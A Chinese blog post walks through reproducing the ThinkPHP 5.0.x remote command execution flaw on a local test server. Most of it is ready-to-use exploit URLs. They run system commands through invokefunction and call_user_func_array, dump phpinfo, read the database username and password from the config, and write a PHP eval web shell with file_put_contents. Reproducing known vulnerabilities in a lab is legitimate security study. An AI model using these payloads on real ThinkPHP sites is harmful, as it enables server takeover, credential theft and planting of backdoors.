美文网首页
ThinkPHP 5.* 远程命令执行漏洞复现与GETSHELL

ThinkPHP 5.* 远程命令执行漏洞复现与GETSHELL

作者: 时光与她Time | 来源:发表于2019-11-10 17:27 被阅读0次

    Thinkphp 下载地址:
    http://www.thinkphp.cn/donate/download/id/1125.html     ThinkPHP5.0.15完整版 

    本地环境搭建phpstudy ,在WWW根目录建立文件夹放入代码

    如果想要开启 debug 报错 在目录建立 文件

    里面的内容写:     APP_DEBUG = true  

    成功开启debug报错

    漏洞复现:

    漏洞exp:  index.php?a=system&b=id&_method=filter

    http://127.0.0.1/thinkphp5015/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

    网页直接返回 whoami

    3、通过phpinfo函数写出phpinfo()的信息:

    http://127.0.0.1/thinkphp5015/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars%5B0%5D=phpinfo&vars%5B1%5D%5B%5D=1

    获取数据库用户名和密码,把username 改成 password  获得数据库的密码

    http://127.0.0.1/thinkphp5015/public//?s=.|think\config/get&name=database.username

    写入shell

    /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=test.php&vars[1][]=<?php @eval($_POST['code']);?>

    相关文章

      网友评论

          本文标题:ThinkPHP 5.* 远程命令执行漏洞复现与GETSHELL

          本文链接:https://www.haomeiwen.com/subject/qsjabctx.html

          延伸阅读

          深度阅读

          • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

          栏目导航

          热点阅读

          关于我们|服务条款|联系我们|ThinkPHP 5.* 远程命令执行漏洞复现与GETSHELL|投稿指南|网站地图|RSS订阅|排版工具|手机版

          提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

          Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

          备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

          本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

          所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!